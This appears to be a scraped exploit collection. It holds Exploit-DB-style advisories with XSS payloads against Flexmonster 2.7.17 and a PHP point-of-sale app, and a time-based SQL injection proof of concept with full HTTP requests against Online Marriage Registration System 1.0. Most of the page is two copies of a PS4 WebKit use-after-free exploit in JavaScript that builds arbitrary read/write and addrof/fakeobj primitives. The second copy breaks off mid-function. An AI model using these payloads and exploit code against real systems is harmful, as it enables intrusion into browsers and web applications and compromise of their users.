ISHACK AI BOT

# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20142 Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table & Charts 2.7.17. Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteCSV")><!--

# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20140 Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17 Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteReport")><!--

# Exploit Title: Point of Sale System 1.0 - Multiple Stored XSS # Exploit Author: Saeed Bala Ahmed (r0b0tG4nG) # Date: 2020-12-18 # Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html # Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code # Affected Version: Version 1 # Tested on: Parrot OS Step 1. Login to the application with admin credentials Step 2. Click on "Suppliers" in header and select "Add Supplier". Step 3. Input "<script>alert("r0b0tG4nG")</script>" in all fields of the form. Note: Stored XSS vulnerability can also be found "Customers Page" when you select "Add New Customer". Apply Same method above to execute Stored XSS. Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Suppliers Page", your XSS Payloads will be triggered. Note: Stored XSS can also be triggered when you click on "Products Page" and select "Add New Product".

# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version: Flexmonster Pivot Table & Charts 2.7.17 # Tested on: Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20139 Cross Site Scripting (XSS) vulnerability in the Remote JSON component Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OpenRemoteJSON")><!--

# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection # Date: 12-21-2020 # Exploit Authors: Andrea Bruschi, Raffaele Sabato # Vendor: Phpgurukul # Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 # CVE: CVE-2020-35151 I DESCRIPTION ======================================================================== A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account. Following the vulnerable code: $sdata=$_POST['searchdata']; ?> <h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4> <table id="datatable1" class="table display responsive nowrap"> <thead> <tr> <th class="wd-15p">S.No</th> <th class="wd-15p">Reg Number</th> <th class="wd-20p">Husband Name</th> <th class="wd-10p">Date of Marriage</th> <th class="wd-10p">Status</th> <th class="wd-25p">Action</th> </tr> </thead> <tbody> <?php $uid=$_SESSION['omrsuid']; $sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'"; $query = $dbh -> prepare($sql); $query->execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); II PROOF OF CONCEPT ======================================================================== ## Request user POST /omrs/user/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884 Content-Length: 320 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/omrs/user/search.php Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2 Upgrade-Insecure-Requests: 1 -----------------------------197361427118054779422510078884 Content-Disposition: form-data; name="searchdata" ' and (select 1 from (select(sleep(5)))a) and 'a'='a -----------------------------197361427118054779422510078884 Content-Disposition: form-data; name="search" -----------------------------197361427118054779422510078884-- ## Request admin POST /omrs/admin/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522 Content-Length: 320 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/omrs/admin/search.php Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2 Upgrade-Insecure-Requests: 1 -----------------------------267799269040335247322746025522 Content-Disposition: form-data; name="searchdata" ' and (select 1 from (select(sleep(5)))a) and 'a'='a -----------------------------267799269040335247322746025522 Content-Disposition: form-data; name="search" -----------------------------267799269040335247322746025522--

const OFFSET_ELEMENT_REFCOUNT = 0x10; const OFFSET_JSAB_VIEW_VECTOR = 0x10; const OFFSET_JSAB_VIEW_LENGTH = 0x18; const OFFSET_LENGTH_STRINGIMPL = 0x04; const OFFSET_HTMLELEMENT_REFCOUNT = 0x14; const LENGTH_ARRAYBUFFER = 0x8; const LENGTH_STRINGIMPL = 0x14; const LENGTH_JSVIEW = 0x20; const LENGTH_VALIDATION_MESSAGE = 0x30; const LENGTH_TIMER = 0x48; const LENGTH_HTMLTEXTAREA = 0xd8; const SPRAY_ELEM_SIZE = 0x6000; const SPRAY_STRINGIMPL = 0x1000; const NB_FRAMES = 0xfa0; const NB_REUSE = 0x8000; var g_arr_ab_1 = []; var g_arr_ab_2 = []; var g_arr_ab_3 = []; var g_frames = []; var g_relative_read = null; var g_relative_rw = null; var g_ab_slave = null; var g_ab_index = null; var g_timer_leak = null; var g_jsview_leak = null; var g_jsview_butterfly = null; var g_message_heading_leak = null; var g_message_body_leak = null; var g_obj_str = {}; var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px"; var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px"; var g_round = 1; var g_input = null; var guess_htmltextarea_addr = new Int64("0x2031b00d8"); var master_b = new Uint32Array(2); var slave_b = new Uint32Array(2); var slave_addr; var slave_buf_addr; var master_addr; /* Executed after deleteBubbleTree */ function setupRW() { /* Now the m_length of the JSArrayBufferView should be 0xffffff01 */ for (let i = 0; i < g_arr_ab_3.length; i++) { if (g_arr_ab_3[i].length > 0xff) { g_relative_rw = g_arr_ab_3[i]; debug_log("[+] Succesfully got a relative R/W"); break; } } if (g_relative_rw === null) die("[!] Failed to setup a relative R/W primitive"); debug_log("[+] Setting up arbitrary R/W"); /* Retrieving the ArrayBuffer address using the relative read */ let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1; let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR)); /* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */ let ab_index = g_jsview_leak.sub(ab_addr).low32(); if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER) g_ab_index = ab_index + LENGTH_JSVIEW; else g_ab_index = ab_index - LENGTH_JSVIEW; /* Overding the length of one JSArrayBufferView with a known value */ g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41; /* Looking for the slave JSArrayBufferView */ for (let i = 0; i < g_arr_ab_3.length; i++) { if (g_arr_ab_3[i].length === 0x41) { g_ab_slave = g_arr_ab_3[i]; g_arr_ab_3 = null; break; } } if (g_ab_slave === null) die("[!] Didn't found the slave JSArrayBufferView"); /* Extending the JSArrayBufferView length */ g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff; debug_log("[+] Testing arbitrary R/W"); let saved_vtable = read64(guess_htmltextarea_addr); write64(guess_htmltextarea_addr, new Int64("0x4141414141414141")); if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141")) die("[!] Failed to setup arbitrary R/W primitive"); debug_log("[+] Succesfully got arbitrary R/W!"); /* Restore the overidden vtable pointer */ write64(guess_htmltextarea_addr, saved_vtable); /* Cleanup memory */ cleanup(); /* Set up addrof/fakeobj primitives */ g_ab_slave.leakme = 0x1337; var bf = 0; for(var i = 15; i >= 8; i--) bf = 256 * bf + g_relative_rw[g_ab_index + i]; g_jsview_butterfly = new Int64(bf); if(!read64(g_jsview_butterfly.sub(16)).equals(new Int64("0xffff000000001337"))) die("[!] Failed to setup addrof/fakeobj primitives"); debug_log("[+] Succesfully got addrof/fakeobj"); /* Getting code execution */ /* ... */ var leak_slave = addrof(slave_b); var slave_addr = read64(leak_slave.add(0x10)); og_slave_addr = new int64(slave_addr.low32(), slave_addr.hi32()); var leak_master = addrof(master_b); write64(leak_master.add(0x10), leak_slave.add(0x10)); var prim = { write8: function(addr, val) { master_b[0] = addr.low; master_b[1] = addr.hi; if(val instanceof int64) { slave_b[0] = val.low; slave_b[1] = val.hi; } else { slave_b[0] = val; slave_b[1] = 0; } master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; }, write4: function(addr, val) { master_b[0] = addr.low; master_b[1] = addr.hi; slave_b[0] = val; master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; }, read8: function(addr) { master_b[0] = addr.low; master_b[1] = addr.hi; var r = new int64(slave_b[0], slave_b[1]); master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; return r; }, read4: function(addr) { master_b[0] = addr.low; master_b[1] = addr.hi; var r = slave_b[0]; master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; return r; }, leakval: function(val) { g_ab_slave.leakme = val; master_b[0] = g_jsview_butterfly.low32() - 0x10; master_b[1] = g_jsview_butterfly.hi32(); var r = new int64(slave_b[0], slave_b[1]); master_b[0] = og_slave_addr.low; master_b[1] = og_slave_addr.hi; return r; }, }; window.prim = prim; setTimeout(stage2, 1000); } function read(addr, length) { for (let i = 0; i < 8; i++) g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i); let arr = []; for (let i = 0; i < length; i++) arr.push(g_ab_slave[i]); return arr; } function read64(addr) { return new Int64(read(addr, 8)); } function write(addr, data) { for (let i = 0; i < 8; i++) g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i); for (let i = 0; i < data.length; i++) g_ab_slave[i] = data[i]; } function write64(addr, data) { write(addr, data.bytes()); } function addrof(obj) { g_ab_slave.leakme = obj; return read64(g_jsview_butterfly.sub(16)); } function fakeobj(addr) { write64(g_jsview_butterfly.sub(16), addr); return g_ab_slave.leakme; } function cleanup() { select1.remove(); select1 = null; input1.remove(); input1 = null; input2.remove(); input2 = null; input3.remove(); input3 = null; div1.remove(); div1 = null; g_input = null; g_rows1 = null; g_rows2 = null; g_frames = null; } /* * Executed after buildBubbleTree * and before deleteBubbleTree */ function confuseTargetObjRound2() { if (findTargetObj() === false) die("[!] Failed to reuse target obj."); g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble(); setTimeout(setupRW, 6000); } /* Executed after deleteBubbleTree */ function leakJSC() { debug_log("[+] Looking for the smashed StringImpl..."); var arr_str = Object.getOwnPropertyNames(g_obj_str); /* Looking for the smashed string */ for (let i = arr_str.length - 1; i > 0; i--) { if (arr_str[i].length > 0xff) { debug_log("[+] StringImpl corrupted successfully"); g_relative_read = arr_str[i]; g_obj_str = null; break; } } if (g_relative_read === null) die("[!] Failed to setup a relative read primitive"); debug_log("[+] Got a relative read"); var tmp_spray = {}; for(var i = 0; i < 100000; i++) tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + (''+i).padStart(5, '0')] = 0x1337; let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER); /* Spraying JSView */ let tmp = []; for (let i = 0; i < 0x10000; i++) { /* The last allocated are more likely to be allocated after our relative read */ if (i >= 0xfc00) g_arr_ab_3.push(new Uint8Array(ab)); else tmp.push(new Uint8Array(ab)); } tmp = null; /* * Force JSC ref on FastMalloc Heap * https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151 */ var props = []; for (var i = 0; i < 0x400; i++) { props.push({ value: 0x42424242 }); props.push({ value: g_arr_ab_3[i] }); } /* * /!\ * This part must avoid as much as possible fastMalloc allocation * to avoid re-using the targeted object * /!\ */ /* Use relative read to find our JSC obj */ /* We want a JSView that is allocated after our relative read */ while (g_jsview_leak === null) { Object.defineProperties({}, props); for (let i = 0; i < 0x800000; i++) { var v = undefined; if (g_relative_read.charCodeAt(i) === 0x42 && g_relative_read.charCodeAt(i + 0x01) === 0x42 && g_relative_read.charCodeAt(i + 0x02) === 0x42 && g_relative_read.charCodeAt(i + 0x03) === 0x42) { if (g_relative_read.charCodeAt(i + 0x08) === 0x00 && g_relative_read.charCodeAt(i + 0x0f) === 0x00 && g_relative_read.charCodeAt(i + 0x10) === 0x00 && g_relative_read.charCodeAt(i + 0x17) === 0x00 && g_relative_read.charCodeAt(i + 0x18) === 0x0e && g_relative_read.charCodeAt(i + 0x1f) === 0x00 && g_relative_read.charCodeAt(i + 0x28) === 0x00 && g_relative_read.charCodeAt(i + 0x2f) === 0x00 && g_relative_read.charCodeAt(i + 0x30) === 0x00 && g_relative_read.charCodeAt(i + 0x37) === 0x00 && g_relative_read.charCodeAt(i + 0x38) === 0x0e && g_relative_read.charCodeAt(i + 0x3f) === 0x00) v = new Int64(str2array(g_relative_read, 8, i + 0x20)); else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 && g_relative_read.charCodeAt(i + 0x11) === 0x42 && g_relative_read.charCodeAt(i + 0x12) === 0x42 && g_relative_read.charCodeAt(i + 0x13) === 0x42) v = new Int64(str2array(g_relative_read, 8, i + 8)); } if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) { g_jsview_leak = v; props = null; break; } } } /* * /!\ * Critical part ended-up here * /!\ */ debug_log("[+] JSArrayBufferView: " + g_jsview_leak); /* Run the exploit again */ prepareUAF(); } /* * Executed after buildBubbleTree * and before deleteBubbleTree */ function confuseTargetObjRound1() { /* Force allocation of StringImpl obj. beyond Timer address */ sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2); /* Checking for leaked data */ if (findTargetObj() === false) die("[!] Failed to reuse target obj."); dumpTargetObj(); g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble(); /* * The timeout must be > 5s because deleteBubbleTree is scheduled to run in * the next 5s */ setTimeout(leakJSC, 6000); } function handle2() { /* focus elsewhere */ input2.focus(); } function reuseTargetObj() { /* Delete ValidationMessage instance */ document.body.appendChild(g_input); /* * Free ValidationMessage neighboors. * SmallLine is freed -> SmallPage is cached */ for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++) g_frames[i].setAttribute("rows", ','); /* Get back target object */ for (let i = 0; i < NB_REUSE; i++) { let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE); let view = new Float64Array(ab); view[0] = guess_htmltextarea_addr.asDouble(); // m_element view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble g_arr_ab_1.push(view); } if (g_round == 1) { /* * Spray a couple of StringImpl obj. prior to Timer allocation * This will force Timer allocation on same SmallPage as our Strings */ sprayStringImpl(0, SPRAY_STRINGIMPL); g_frames = []; g_round += 1; g_input = input3; setTimeout(confuseTargetObjRound1, 10); } else { setTimeout(confuseTargetObjRound2, 10); } } function dumpTargetObj() { debug_log("[+] m_timer: " + g_timer_leak); debug_log("[+] m_messageHeading: " + g_message_heading_leak); debug_log("[+] m_messageBody: " + g_message_body_leak); } function findTargetObj() { for (let i = 0; i < g_arr_ab_1.length; i++) { if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) { debug_log("[+] Found fake ValidationMessage"); if (g_round === 2) { g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]); g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]); g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]); g_round++; } g_fake_validation_message = g_arr_ab_1[i]; g_arr_ab_1 = []; return true; } } return false; } function prepareUAF() { g_input.setCustomValidity("ps4"); for (let i = 0; i < NB_FRAMES; i++) { var element = document.createElement("frameset"); g_frames.push(element); } g_input.reportValidity(); var div = document.createElement("div"); document.body.appendChild(div); div.appendChild(g_input); /* First half spray */ for (let i = 0; i < NB_FRAMES / 2; i++) g_frames[i].setAttribute("rows", g_rows1); /* Instantiate target obj */ g_input.reportValidity(); /* ... and the second half */ for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++) g_frames[i].setAttribute("rows", g_rows2); g_input.setAttribute("onfocus", "reuseTargetObj()"); g_input.autofocus = true; } /* HTMLElement spray */ function sprayHTMLTextArea() { debug_log("[+] Spraying HTMLTextareaElement ..."); let textarea_div_elem = document.createElement("div"); document.body.appendChild(textarea_div_elem); textarea_div_elem.id = "div1"; var element = document.createElement("textarea"); /* Add a style to avoid textarea display */ element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;'; /* * This spray is not perfect, "element.cloneNode" will trigger a fastMalloc * allocation of the node attributes and an IsoHeap allocation of the * Element. The virtual page layout will look something like that: * [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...] */ for (let i = 0; i < SPRAY_ELEM_SIZE; i++) textarea_div_elem.appendChild(element.cloneNode()); } /* StringImpl Spray */ function sprayStringImpl(start, end) { for (let i = start; i < end; i++) { let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0")); g_obj_str[s] = 0x1337; } } function go() { /* Init spray */ sprayHTMLTextArea(); g_input = input1; /* Shape heap layout for obj. reuse */ prepareUAF(); }

const OFFSET_ELEMENT_REFCOUNT = 0x10; const OFFSET_JSAB_VIEW_VECTOR = 0x10; const OFFSET_JSAB_VIEW_LENGTH = 0x18; const OFFSET_LENGTH_STRINGIMPL = 0x04; const OFFSET_HTMLELEMENT_REFCOUNT = 0x14; const LENGTH_ARRAYBUFFER = 0x8; const LENGTH_STRINGIMPL = 0x14; const LENGTH_JSVIEW = 0x20; const LENGTH_VALIDATION_MESSAGE = 0x30; const LENGTH_TIMER = 0x48; const LENGTH_HTMLTEXTAREA = 0xd8; const SPRAY_ELEM_SIZE = 0x6000; const SPRAY_STRINGIMPL = 0x1000; const NB_FRAMES = 0xfa0; const NB_REUSE = 0x8000; var g_arr_ab_1 = []; var g_arr_ab_2 = []; var g_arr_ab_3 = []; var g_frames = []; var g_relative_read = null; var g_relative_rw = null; var g_ab_slave = null; var g_ab_index = null; var g_timer_leak = null; var g_jsview_leak = null; var g_message_heading_leak = null; var g_message_body_leak = null; var g_obj_str = {}; var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px"; var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px"; var g_round = 1; var g_input = null; var guess_htmltextarea_addr = new Int64("0x2070a00d8"); /* Executed after deleteBubbleTree */ function setupRW() { /* Now the m_length of the JSArrayBufferView should be 0xffffff01 */ for (let i = 0; i < g_arr_ab_3.length; i++) { if (g_arr_ab_3[i].length > 0xff) { g_relative_rw = g_arr_ab_3[i]; debug_log("[+] Succesfully got a relative R/W"); break; } } if (g_relative_rw === null) die("[!] Failed to setup a relative R/W primitive"); debug_log("[+] Setting up arbitrary R/W"); /* Retrieving the ArrayBuffer address using the relative read */ let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1; let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR)); /* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */ let ab_index = g_jsview_leak.sub(ab_addr).low32(); if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER) g_ab_index = ab_index + LENGTH_JSVIEW; else g_ab_index = ab_index - LENGTH_JSVIEW; /* Overding the length of one JSArrayBufferView with a known value */ g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41; /* Looking for the slave JSArrayBufferView */ for (let i = 0; i < g_arr_ab_3.length; i++) { if (g_arr_ab_3[i].length === 0x41) { g_ab_slave = g_arr_ab_3[i]; g_arr_ab_3 = null; break; } } if (g_ab_slave === null) die("[!] Didn't found the slave JSArrayBufferView"); /* Extending the JSArrayBufferView length */ g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff; g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff; debug_log("[+] Testing arbitrary R/W"); let saved_vtable = read64(guess_htmltextarea_addr); write64(guess_htmltextarea_addr, new Int64("0x4141414141414141")); if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141")) die("[!] Failed to setup arbitrary R/W primitive"); debug_log("[+] Succesfully got arbitrary R/W!"); /* Restore the overidden vtable pointer */ write64(guess_htmltextarea_addr, saved_vtable); /* Cleanup memory */ cleanup(); /* Getting code execution */ /* ... */ } function read(addr, length) { for (let i = 0; i < 8; i++) g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i); let arr = []; for (let i = 0; i < length; i++) arr.push(g_ab_slave[i]); return arr; } function read64(addr) { return new Int64(read(addr, 8)); } function write(addr, data) { for (let i = 0; i < 8; i++) g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i); for (let i = 0; i < data.length; i++) g_ab_slave[i] = data[i]; } function write64(addr, data) { write(addr, data.bytes()); } function cleanup() { select1.remove(); select1 = null; input1.remove(); input1 = null; input2.remove(); input2 = null; input3.remove(); input3 = null; div1.remove(); div1 = null; g_input = null; g_rows1 = null; g_rows2 = null; g_frames = null; } /* * Executed after buildBubbleTree * and before deleteBubbleTree */ function confuseTargetObjRound2() { if (findTargetObj() === false) die("[!] Failed to reuse target obj."); g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble(); setTimeout(setupRW, 6000); } /* Executed after deleteBubbleTree */ function leakJSC() { debug_log("[+] Looking for the smashed StringImpl..."); var arr_str = Object.getOwnPropertyNames(g_obj_str); /* Looking for the smashed string */ for (let i = arr_str.length - 1; i > 0; i--) { if (arr_str[i].length > 0xff) { debug_log("[+] StringImpl corrupted successfully"); g_relative_read = arr_str[i]; g_obj_str = null; break; } } if (g_relative_read === null) die("[!] Failed to setup a relative read primitive"); debug_log("[+] Got a relative read"); let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER); /* Spraying JSView */ let tmp = []; for (let i = 0; i < 0x10000; i++) { /* The last allocated are more likely to be allocated after our relative read */ if (i >= 0xfc00) g_arr_ab_3.push(new Uint8Array(ab)); else tmp.push(new Uint8Array(ab)); } tmp = null; /* * Force JSC ref on FastMalloc Heap * https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151 */ var props = []; for (var i = 0; i < 0x400; i++) { props.push({ value: 0x42424242 }); props.push({ value: g_arr_ab_3[i] }); } /* * /!\ * This part must avoid as much as possible fastMalloc allocation * to avoid re-using the targeted object * /!\ */ /* Use relative read to find our JSC obj */ /* We want a JSView that is allocated after our relative read */ while (g_jsview_leak === null) { Object.defineProperties({}, props); for (let i = 0; i < 0x800000; i++) { var v = undefined; if (g_relative_read.charCodeAt(i) === 0x42 && g_relative_read.charCodeAt(i + 0x01) === 0x42 && g_relative_read.charCodeAt(i + 0x02) === 0x42 && g_relative_read.charCodeAt(i + 0x03) === 0x42) { if (g_relative_read.charCodeAt(i + 0x08) === 0x00 && g_relative_read.charCodeAt(i + 0x0f) === 0x00 && g_relative_read.charCodeAt(i + 0x10) === 0x00 && g_relative_read.charCodeAt(i + 0x17) === 0x00 && g_relative_read.charCodeAt(i + 0x18) === 0x0e && g_relative_read.charCodeAt(i + 0x1f) === 0x00 && g_relative_read.charCodeAt(i + 0x28) === 0x00 && g_relative_read.charCodeAt(i + 0x2f) === 0x00 && g_relative_read.charCodeAt(i + 0x30) === 0x00 && g_relative_read.charCodeAt(i + 0x37) === 0x00 && g_relative_read.charCodeAt(i + 0x38) === 0x0e && g_relative_read.charCodeAt(i + 0x3f) === 0x00) v = new Int64(str2array(g_relative_read, 8, i + 0x20)); else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 && g_relative_read.charCodeAt(i + 0x11) === 0x42 && g_relative_read.charCodeAt(i + 0x12) === 0x42 && g_relative_read.charCodeAt(i + 0x13) === 0x42) v = new Int64(str2array(g_relative_read, 8, i + 8)); } if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) { g_jsview_leak = v; props = null; break; } } } /* * /!\ * Critical part ended-up here * /!\ */ debug_log("[+] JSArrayBufferView: " + g_jsview_leak); /* Run the exploit again */ prepareUAF(); } /* * Executed after buildBubbleTree * and before deleteBubbleTree */ function confuseTargetObjRound1() { /* Force allocation of StringImpl obj. beyond Timer address */ sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2); /* Checking for leaked data */ if (findTargetObj() === false) die("[!] Failed to reuse target obj."); dumpTargetObj(); g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble(); /* * The timeout must be > 5s because deleteBubbleTree is scheduled to run in * the next 5s */ setTimeout(leakJSC, 6000); } function handle2() { /* focus elsewhere */ input2.focus(); } function reuseTargetObj() { /* Delete ValidationMessage instance */ document.body.appendChild(g_input); /* * Free ValidationMessage neighboors. * SmallLine is freed -> SmallPage is cached */ for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++) g_frames[i].setAttribute("rows", ','); /* Get back target object */ for (let i = 0; i < NB_REUSE; i++) { let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE); let view = new Float64Array(ab); view[0] = guess_htmltextarea_addr.asDouble(); // m_element view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble g_arr_ab_1.push(view); } if (g_round == 1) { /* * Spray a couple of StringImpl obj. prior to Timer allocation * This will force Timer allocation on same SmallPage as our Strings */ sprayStringImpl(0, SPRAY_STRINGIMPL); g_frames = []; g_round += 1; g_input = input3; setTimeout(confuseTargetObjRound1, 10); } else { setTimeout(confuseTargetObjRound2, 10); } } function dumpTargetObj() { debug_log("[+] m_timer: " + g_timer_leak); debug_log("[+] m_messageHeading: " + g_message_heading_leak); debug_log("[+] m_messageBody: " + g_message_body_leak); } function findTargetObj() { for (let i = 0; i < g_arr_ab_1.length; i++) { if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) { debug_log("[+] Found fake ValidationMessage"); if (g_round === 2) { g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]); g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]); g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]); g_round++; } g_fake_validation_message = g_arr_ab_1[i]; g_arr_ab_1 = []; return true; } } return false; } function prepareUAF() { g_input.setCustomValidity("ps4"); for (let i = 0; i < NB_FRAMES; i++) { var element = document.createElement("frameset"); g_frames.push(element); } g_input.reportValidity(); var div = document.createElement("div"); document.body.appendChild(div); div.appendChild(g_input); /* First half spray */ for (let i = 0; i < NB_FRAMES / 2; i++) g_frames[i].setAttribute("rows", g_rows1); /* Instantiate target obj */ g_input.reportValidity(); /* ... and the second half */ for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++) g_frames[i].setAttribute("rows", g_rows2); g_input.setAttribute("onfocus", "reuseTargetObj()"); g_input.autofocus = true; } /* HTMLElement spray */ function sprayHTMLTextArea() { debug_log("[+] Spraying HTMLTextareaElement ..."); let textarea_div_elem = document.createElement("div"); 